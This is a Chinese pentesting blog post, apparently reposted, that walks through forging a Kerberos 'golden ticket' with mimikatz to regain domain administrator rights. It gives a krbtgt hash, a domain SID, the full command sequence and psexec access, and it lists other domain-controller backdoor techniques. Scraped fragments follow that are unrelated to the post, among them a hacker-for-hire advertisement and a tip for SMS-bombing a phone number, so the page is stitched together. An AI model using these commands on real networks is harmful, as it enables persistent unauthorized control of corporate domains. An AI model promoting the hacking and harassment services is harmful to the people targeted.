最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。
我原来发过一个微博说
这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:
要重新拿回域管理员权限,首先要先知道域内的管理员有谁
我这里的实验环境,通过截图可以看到域管理员是administrator
我还要知道域SID是啥
我的域SID是
还有最重要的krbtgt用户的ntlm哈希,我原来导出的是
krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::
然后该用神器mimikatz出场了,依次执行
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
到现在,我们又重新拥有域管理员权限了,可以验证下
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。
当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。
【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】
本文目录一览: 1、手机远程怎么控制小孩的平板 2、如何实现用手机远程控制电脑? 3、手机怎么远程控制电脑 手机远程怎么控制小孩的平板 随着生活水平的逐渐提高,电子数码产品也是家家户户都有在...
现在的生活水平提升了,餐饮文化得到了越来越多的人的重视,那么人们的思想观念得到了翻天覆地的改变,所以同时也是为餐饮行业的发展带来新的发展机会。火锅行业是经久不衰的,在餐饮行业市场的行情是非常不错的,而...
一、网络黑客找人犯法吗(网络黑客找人网站) 1、找黑客攻击网站会被判刑吗那说明你找的黑客就不是牛黑客,属于入门级别的吧。要不然怎么会很轻松的就留下了痕迹。但是黑别人的网站是不对的,严重的确实会判刑。...
黑客24小时服务σσ;⒙⒉⒎⒏⒋⒐⒊██▓██▓信誉100%专业100%.我、上、个、月、就、是、找、他、们、帮、我、的。技、术、好、放、心、已、经、帮、我、解、决。〖+大户追款怎么收费〗,TD1yz...
QQ宠物管家v1120绿色版未知2006-11-290·b061120更新内容1.修正旅游的时候无法喂洗的BUG Q宠保姆是一个完全自主开发的自动喂养QQ宠物的绿色软件,为广大QQ宠物的用户提供优质挂...
下载一个手机炸弹软件随便输入一个手机号码然后选择次数之类的利用WSockExpert_Cn.exe监听手机炸弹得出http://sms.98960.com/pages/user-newlogin.as...